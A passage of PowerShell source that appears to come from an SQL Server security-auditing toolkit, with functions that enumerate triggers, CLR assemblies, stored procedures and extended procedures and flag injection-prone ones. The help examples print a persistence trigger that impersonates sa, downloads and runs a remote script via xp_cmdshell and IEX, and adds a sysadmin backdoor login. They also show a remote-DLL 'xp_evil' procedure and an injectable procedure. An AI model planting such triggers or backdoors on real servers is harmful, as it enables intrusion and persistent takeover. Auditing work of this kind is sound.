if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Define Query $Query = " SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], name as [TriggerName], object_id as [TriggerId], [TriggerType] = 'SERVER', type_desc as [ObjectType], parent_class_desc as [ObjectClass], OBJECT_DEFINITION(OBJECT_ID) as [TriggerDefinition], create_date, modify_date, is_ms_shipped, is_disabled FROM [master].[sys].[server_triggers] WHERE 1=1 $TriggerNameFilter" # Execute Query $TblDdlTriggersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results $TblDdlTriggers = $TblDdlTriggers + $TblDdlTriggersTemp } End { # Return data $TblDdlTriggers } } # ---------------------------------- # Get-SQLTriggerDml # ---------------------------------- # Author: Scott Sutherland Function Get-SQLTriggerDml { <# .SYNOPSIS Returns DML trigger information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DatabaseName Database name to filter for. .PARAMETER TriggerName Trigger name to filter for. .EXAMPLE PS C:\> Get-SQLTriggerDml -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseName : testdb TriggerName : persistence_dml_1 TriggerId : 565577053 TriggerType : DATABASE ObjectType : SQL_TRIGGER ObjectClass : OBJECT_OR_COLUMN TriggerDefinition : -- Create trigger CREATE TRIGGER [persistence_dml_1] ON testdb.dbo.NOCList FOR INSERT, UPDATE, DELETE AS -- Impersonate sa EXECUTE AS LOGIN = 'sa' -- Download a PowerShell script from the internet to memory and execute it EXEC master..xp_cmdshell 'Powershell -c "IEX(new-object net.webclient).downloadstring(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/trigger_demo_dml.ps1'')"'; -- Add a sysadmin named 'SysAdmin_DML' if it doesn't exist if (select count(*) from sys.sql_logins where name like 'SysAdmin_DML') = 0 -- Create a login CREATE LOGIN SysAdmin_DML WITH PASSWORD = 'Password123!'; -- Add the login to the sysadmin fixed server role EXEC sp_addsrvrolemember 'SysAdmin_DML', 'sysadmin'; create_date : 4/26/2016 8:58:28 PM modify_date : 4/26/2016 8:58:28 PM is_ms_shipped : False is_disabled : False is_not_for_replication : False is_instead_of_trigger : False .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLTriggerDml -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Trigger name.')] [string]$TriggerName, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblDmlTriggers = New-Object -TypeName System.Data.DataTable # Setup login filter if ($TriggerName) { $TriggerNameFilter = " AND name like '$TriggerName'" } else { $TriggerNameFilter = '' } } Process { # Note: Tables queried by this function typically require sysadmin privileges to get all rows. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." Write-Verbose -Message "$Instance : Grabbing DML triggers from the databases below:." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose # Get role for each database $TblDatabases | ForEach-Object -Process { # Get database name $DbName = $_.DatabaseName if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : - $DbName" } # Define Query $Query = " use [$DbName]; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], '$DbName' as [DatabaseName], name as [TriggerName], object_id as [TriggerId], [TriggerType] = 'DATABASE', type_desc as [ObjectType], parent_class_desc as [ObjectClass], OBJECT_DEFINITION(OBJECT_ID) as [TriggerDefinition], create_date, modify_date, is_ms_shipped, is_disabled, is_not_for_replication, is_instead_of_trigger FROM [$DbName].[sys].[triggers] WHERE 1=1 $TriggerNameFilter" # Execute Query $TblDmlTriggersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results $TblDmlTriggers = $TblDmlTriggers + $TblDmlTriggersTemp } } End { # Return data $TblDmlTriggers } } # ---------------------------------- # Get-SQLStoredProcedureCLR # ---------------------------------- # Author: Scott Sutherland Function Get-SQLStoredProcedureCLR { <# .SYNOPSIS Returns stored procedures created from CLR assemblies for each accessible database. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER DatabaseName Database name to filter for. .PARAMETER DatabaseUser Database user to filter for. .PARAMETER NoDefaults Only show information for non default databases. .PARAMETER ExportFolder Folder to export CLR DLL files to. .PARAMETER AssemblyName Filter for assembly names that contain the provided word. .EXAMPLE Get CLR stored procedure information and export source DLLs to a folder as a sysadmin. PS C:\> Get-SQLStoredProcedureCLR -Verbose -Instance SQLServer1\Instance1 -ExportFolder . | ft -AutoSize VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Grabbing assembly file information from master. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Creating export folder: .\CLRExports VERBOSE: MSSQLSRV04\SQLSERVER2014 : Creating server folder: .\CLRExports\MSSQLSRV04_SQLSERVER2014 VERBOSE: MSSQLSRV04\SQLSERVER2014 : Creating database folder: .\CLRExports\MSSQLSRV04_SQLSERVER2014\master VERBOSE: MSSQLSRV04\SQLSERVER2014 : - Exporting adduser.dll VERBOSE: MSSQLSRV04\SQLSERVER2014 : - Exporting CLRFile.dll VERBOSE: MSSQLSRV04\SQLSERVER2014 : - Exporting runcmd.dll.dll ComputerName Instance DatabaseName assembly_method assembly_id assembly_name file_id file_name clr_name ------------ -------- ------------ --------------- ----------- ------------- ------- --------- -------- MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 testdb readfile 65537 filetools 1 filetools filetools, ve... MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 testdb writefile 65537 filetools 1 filetools filetools, ve... MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 testdb runcmd 65558 runcmd 1 ostools ostools,... .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLStoredProcedureCLR -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Filter for filenames.')] [string]$AssemblyName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Folder to export DLLs to.')] [string]$ExportFolder, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Do not show database users associated with default databases.')] [Switch]$NoDefaults, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Show native CLR as well.')] [Switch]$ShowAll, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblAssemblyFiles = New-Object -TypeName System.Data.DataTable $null = $TblAssemblyFiles.Columns.Add('ComputerName') $null = $TblAssemblyFiles.Columns.Add('Instance') $null = $TblAssemblyFiles.Columns.Add('DatabaseName') $null = $TblAssemblyFiles.Columns.Add('schema_name') $null = $TblAssemblyFiles.Columns.Add('file_id') $null = $TblAssemblyFiles.Columns.Add('file_name') $null = $TblAssemblyFiles.Columns.Add('clr_name') $null = $TblAssemblyFiles.Columns.Add('assembly_id') $null = $TblAssemblyFiles.Columns.Add('assembly_name') $null = $TblAssemblyFiles.Columns.Add('assembly_class') $null = $TblAssemblyFiles.Columns.Add('assembly_method') $null = $TblAssemblyFiles.Columns.Add('sp_object_id') $null = $TblAssemblyFiles.Columns.Add('sp_name') $null = $TblAssemblyFiles.Columns.Add('sp_type') $null = $TblAssemblyFiles.Columns.Add('permission_set_desc') $null = $TblAssemblyFiles.Columns.Add('create_date') $null = $TblAssemblyFiles.Columns.Add('modify_date') $null = $TblAssemblyFiles.Columns.Add('content') } Process { # Note: Tables queried by this function typically require sysadmin or DBO privileges. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Get list of databases if($NoDefaults) { $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose -NoDefaults } else { $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose } # Setup assembly name filter if($AssemblyName){ $AssemblyNameQuery = "WHERE af.name LIKE '%$AssemblyName%'" }else{ $AssemblyNameQuery = "" } # Set counter $Counter = 0 # Get the privs for each database $TblDatabases | ForEach-Object -Process { # Set DatabaseName filter $DbName = $_.DatabaseName if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Searching for CLR stored procedures in $DbName" } # Define Query $Query = " USE $DbName; SELECT SCHEMA_NAME(so.[schema_id]) AS [schema_name], af.file_id, af.name + '.dll' as [file_name], asmbly.clr_name, asmbly.assembly_id, asmbly.name AS [assembly_name], am.assembly_class, am.assembly_method, so.object_id as [sp_object_id], so.name AS [sp_name], so.[type] as [sp_type], asmbly.permission_set_desc, asmbly.create_date, asmbly.modify_date, af.content FROM sys.assembly_modules am INNER JOIN sys.assemblies asmbly ON asmbly.assembly_id = am.assembly_id INNER JOIN sys.assembly_files af ON asmbly.assembly_id = af.assembly_id INNER JOIN sys.objects so ON so.[object_id] = am.[object_id] $AssemblyNameQuery" $NativeStuff = " UNION ALL SELECT SCHEMA_NAME(at.[schema_id]) AS [SchemaName], af.file_id, af.name + '.dll' as [file_name], asmbly.clr_name, asmbly.assembly_id, asmbly.name AS [AssemblyName], at.assembly_class, NULL AS [assembly_method], NULL as [sp_object_id], at.name AS [sp_name], 'UDT' AS [type], asmbly.permission_set_desc, asmbly.create_date, asmbly.modify_date, af.content FROM sys.assembly_types at INNER JOIN sys.assemblies asmbly ON asmbly.assembly_id = at.assembly_id INNER JOIN sys.assembly_files af ON asmbly.assembly_id = af.assembly_id ORDER BY [assembly_name], [assembly_method], [sp_name]" # Check for showall if($ShowAll){ $Query = "$Query$NativeStuff" } # Execute Query $TblAssemblyFilesTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Add each result to table $TblAssemblyFilesTemp | ForEach-Object -Process { # Add results to table $null = $TblAssemblyFiles.Rows.Add( [string]$ComputerName, [string]$Instance, [string]$DbName, [string]$_.schema_name, [string]$_.file_id, [string]$_.file_name, [string]$_.clr_name, [string]$_.assembly_id, [string]$_.assembly_name, [string]$_.assembly_class, [string]$_.assembly_method, [string]$_.sp_object_id, [string]$_.sp_name, [string]$_.sp_type, [string]$_.permission_set_desc, [string]$_.create_date, [string]$_.modify_date, [string]$_.content) # Setup vars for verbose output $CLRFilename = $_.file_name $CLRMethod = $_.assembly_method $CLRAssembly = $_.assembly_name $CLRAssemblyClass = $_.assembly_class $CLRSp = $_.sp_name # Status user Write-Verbose "$instance : - File:$CLRFilename Assembly:$CLRAssembly Class:$CLRAssemblyClass Method:$CLRMethod Proc:$CLRSp" # Export dll if($ExportFolder){ # Create export folder $ExportOutputFolder = "$ExportFolder\CLRExports" If ((test-path $ExportOutputFolder) -eq $False){ Write-Verbose "$instance : Creating export folder: $ExportOutputFolder" $null = New-Item -Path "$ExportOutputFolder" -type directory } # Create instance subfolder if it doesnt exist $InstanceClean = $Instance -replace('\\','_') $ServerPath = "$ExportOutputFolder\$InstanceClean" If ((test-path $Serverpath) -eq $False){ Write-Verbose "$instance : Creating server folder: $ServerPath" $null = New-Item -Path "$ServerPath" -type directory } # Create database subfolder if it doesnt exist $Databasepath = "$ServerPath\$DbName" If ((test-path $Databasepath) -eq $False){ Write-Verbose "$instance : Creating database folder: $Databasepath" $null = New-Item $Databasepath -type directory } # Create dll file if it doesnt exist $FullExportPath = "$Databasepath\$CLRFilename" if(-not (Test-Path $FullExportPath)){ Write-Verbose "$Instance : Exporting $CLRFilename" $_.content | Set-Content -Encoding Byte $FullExportPath }else{ Write-Verbose "$Instance : Exporting $CLRFilename - Aborted, file exists." } # Update counter $Counter = $Counter + 1 } } } } End { # Check count $CLRCount = $TblAssemblyFiles.Rows.Count if ($CLRCount -gt 0){ Write-Verbose "$Instance : Found $CLRCount CLR stored procedures" }else{ Write-Verbose "$Instance : No CLR stored procedures found." } # Return data $TblAssemblyFiles } } # ---------------------------------- # Get-SQLStoredProcedure # ---------------------------------- # Author: Scott Sutherland Function Get-SQLStoredProcedure { <# .SYNOPSIS Returns stored procedures from target SQL Servers. Note: Viewing procedure definitions requires the sysadmin role or the VIEW DEFINITION permission. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DatabaseName Database name to filter for. .PARAMETER ProcedureName Procedure name to filter for. .PARAMETER Keyword Filter for procedures that include the keyword. .PARAMETER AutoExec Only select procedures that execute when the SQL Server service starts. .PARAMETER NoDefaults Filter out results from default databases. .EXAMPLE PS C:\> Get-SQLStoredProcedure -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseName : testdb SchemaName : dbo ProcedureName : MyTestProc ProcedureType : PROCEDURE ProcedureDefinition : CREATE PROC MyTestProc WITH EXECUTE AS OWNER as begin select SYSTEM_USER as currentlogin, ORIGINAL_LOGIN() as originallogin end SQL_DATA_ACCESS : MODIFIES ROUTINE_BODY : SQL CREATED : 7/24/2016 3:16:29 PM LAST_ALTERED : 7/24/2016 3:16:29 PM is_ms_shipped : False is_auto_executed : False .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLStoredProcedure -Verbose -NoDefaults #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Procedure name.')] [string]$ProcedureName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Filter for procedures that include the keyword.')] [string]$Keyword, [Parameter(Mandatory = $false, HelpMessage = "Only include procedures configured to execute when SQL Server service starts.")] [switch]$AutoExec, [Parameter(Mandatory = $false, HelpMessage = "Don't select tables from default databases.")] [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblProcs = New-Object -TypeName System.Data.DataTable # Setup routine name filter if ($ProcedureName) { $ProcedureNameFilter = " AND ROUTINE_NAME like '$ProcedureName'" } else { $ProcedureNameFilter = '' } # Setup ROUTINE_DEFINITION filter if ($Keyword) { $KeywordFilter = " AND ROUTINE_DEFINITION like '%$Keyword%'" } else { $KeywordFilter = '' } # Setup AutoExec filter if ($AutoExec) { $AutoExecFilter = " AND is_auto_executed = 1" } else { $AutoExecFilter = '' } } Process { # Parse ComputerName If ($Instance) { $ComputerName = $Instance.split('\')[0].split(',')[0] $Instance = $Instance } else { $ComputerName = $env:COMPUTERNAME $Instance = '.\' } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." Write-Verbose -Message "$Instance : Grabbing stored procedures from databases below:" } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Setup NoDefault filter if($NoDefaults) { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose } else { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose } # Get role for each database $TblDatabases | ForEach-Object -Process { # Get database name $DbName = $_.DatabaseName if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : - $DbName" } # Define Query $Query = " use [$DbName]; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], ROUTINE_CATALOG AS [DatabaseName], ROUTINE_SCHEMA AS [SchemaName], ROUTINE_NAME as [ProcedureName], ROUTINE_TYPE as [ProcedureType], ROUTINE_DEFINITION as [ProcedureDefinition], SQL_DATA_ACCESS, ROUTINE_BODY, CREATED, LAST_ALTERED, b.is_ms_shipped, b.is_auto_executed FROM [INFORMATION_SCHEMA].[ROUTINES] a JOIN [sys].[procedures] b ON a.ROUTINE_NAME = b.name WHERE 1=1 $AutoExecFilter $ProcedureNameFilter $KeywordFilter" # Execute Query $TblProcsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results $TblProcs = $TblProcs + $TblProcsTemp } } End { # Return data $TblProcs } } # ---------------------------------- # Get-SQLStoredProcedureXP # ---------------------------------- # Author: Scott Sutherland Function Get-SQLStoredProcedureXP { <# .SYNOPSIS Returns custom extended stored procedures from target SQL Server databases. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DatabaseName Database name to filter for. .PARAMETER ProcedureName Procedure name to filter for. .PARAMETER NoDefaults Filter out results from default databases. .EXAMPLE PS C:\> Get-SQLStoredProcedureXP -Instance SQLServer1\STANDARDDEV2014 -DatabaseName master ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseName : master object_id : 1559676604 parent_object_id : 0 schema_id : 1 type : X type_desc : EXTENDED_STORED_PROCEDURE name : xp_evil principal_id : text : \\acme.com@SSL\evilxp.txt ctext : {92, 0, 92, 0...} status : 0 create_date : 9/11/2017 11:36:06 AM modify_date : 9/11/2017 11:36:06 AM is_ms_shipped : False is_published : False is_schema_published : False colid : 1 compressed : False encrypted : False id : 1559676604 language : 0 number : 0 texttype : 2 .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLStoredProcedureXP -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Procedure name.')] [string]$ProcedureName, [Parameter(Mandatory = $false, HelpMessage = "Don't select tables from default databases.")] [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblXpProcs = New-Object -TypeName System.Data.DataTable # Setup routine name filter if ($ProcedureName) { $ProcedureNameFilter = " AND NAME like '$ProcedureName'" } else { $ProcedureNameFilter = '' } } Process { # Parse ComputerName If ($Instance) { $ComputerName = $Instance.split('\')[0].split(',')[0] $Instance = $Instance } else { $ComputerName = $env:COMPUTERNAME $Instance = '.\' } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." Write-Verbose -Message "$Instance : Grabbing stored procedures from databases below:" } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Setup NoDefault filter if($NoDefaults) { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose } else { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose } # Get role for each database $TblDatabases | ForEach-Object -Process { # Get database name $DbName = $_.DatabaseName if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : - $DbName" } # Define Query $Query = " use [$DbName]; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], '$DbName' as [DatabaseName], o.object_id, o.parent_object_id, o.schema_id, o.type, o.type_desc, o.name, o.principal_id, s.text, s.ctext, s.status, o.create_date, o.modify_date, o.is_ms_shipped, o.is_published, o.is_schema_published, s.colid, s.compressed, s.encrypted, s.id, s.language, s.number, s.texttype FROM sys.objects o INNER JOIN sys.syscomments s ON o.object_id = s.id WHERE o.type = 'x' $ProcedureNameFilter" # Execute Query $TblXpProcsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results $TblXpProcs = $TblXpProcs + $TblXpProcsTemp } } End { # Count $XpNum = $TblXpProcs.Count if($XpNum -eq 0){ if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : No custom extended stored procedures found." } } # Return data $TblXpProcs } } # ---------------------------------- # Get-SQLStoredProcedureSQLi # ---------------------------------- # Author: Scott Sutherland # Todo: Add column Procedure_Owner_Name # Todo: Add column owner Owner_Is_Sysadmin # Todo: Add is_ms_shipped and is_auto_executed to signed proc query Function Get-SQLStoredProcedureSQLi { <# .SYNOPSIS Returns stored procedures containing dynamic SQL and concatenations that may suffer from SQL injection on target SQL Servers. Note: Viewing procedure definitions requires the sysadmin role or the VIEW DEFINITION permission. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DatabaseName Database name to filter for. .PARAMETER ProcedureName Procedure name to filter for. .PARAMETER Keyword Filter for procedures that include the keyword. .PARAMETER OnlySigned Filter for signed procedures. .PARAMETER AutoExec Only select procedures that execute when the SQL Server service starts. .PARAMETER NoDefaults Filter out results from default databases. .EXAMPLE PS C:\> Get-SQLStoredProcedureSqli -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseName : testdb SchemaName : dbo ProcedureName : sp_sqli ProcedureType : PROCEDURE ProcedureDefinition : -- Create procedure CREATE PROCEDURE sp_sqli @DbName varchar(max) WITH EXECUTE AS OWNER AS BEGIN Declare @query as varchar(max) SET @query = 'SELECT name FROM master..sysdatabases where name like ''%'+ @DbName+'%'' OR name=''tempdb'''; EXECUTE(@query) END GO SQL_DATA_ACCESS : MODIFIES ROUTINE_BODY : SQL CREATED : 7/24/2016 3:16:29 PM LAST_ALTERED : 7/24/2016 3:16:29 PM is_ms_shipped : False is_auto_executed : False .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLStoredProcedureSqli -Verbose -NoDefaults #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Procedure name.')] [string]$ProcedureName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Filter for procedures that include the keyword.')] [string]$Keyword, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Filter for signed procedures.')] [switch]$OnlySigned, [Parameter(Mandatory = $false, HelpMessage = "Only include procedures configured to execute when SQL Server service starts.")] [switch]$AutoExec, [Parameter(Mandatory = $false, HelpMessage = "Don't select tables from default databases.")] [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblProcs = New-Object -TypeName System.Data.DataTable # Setup routine name filter if ($ProcedureName) { $ProcedureNameFilter = " AND ROUTINE_NAME like '$ProcedureName'" } else { $ProcedureNameFilter = '' } # Setup ROUTINE_DEFINITION filter if ($Keyword) { $KeywordFilter = " AND ROUTINE_DEFINITION like '%$Keyword%'" } else { $KeywordFilter = '' } # Setup AutoExec filter if ($AutoExec) { $AutoExecFilter = " AND is_auto_executed = 1" } else { $AutoExecFilter = '' } } Process { # Parse ComputerName If ($Instance) { $ComputerName = $Instance.split('\')[0].split(',')[0] $Instance = $Instance } else { $ComputerName = $env:COMPUTERNAME $Instance = '.\' } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." Write-Verbose -Message "$Instance : Checking databases below for vulnerable stored procedures:" } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Setup NoDefault filter if($NoDefaults) { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose } else { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose } # Get role for each database $TblDatabases | ForEach-Object -Process { # Get database name $DbName = $_.DatabaseName if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : - Checking $DbName database..." } # Define Query $Query = " use [$DbName]; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], ROUTINE_CATALOG 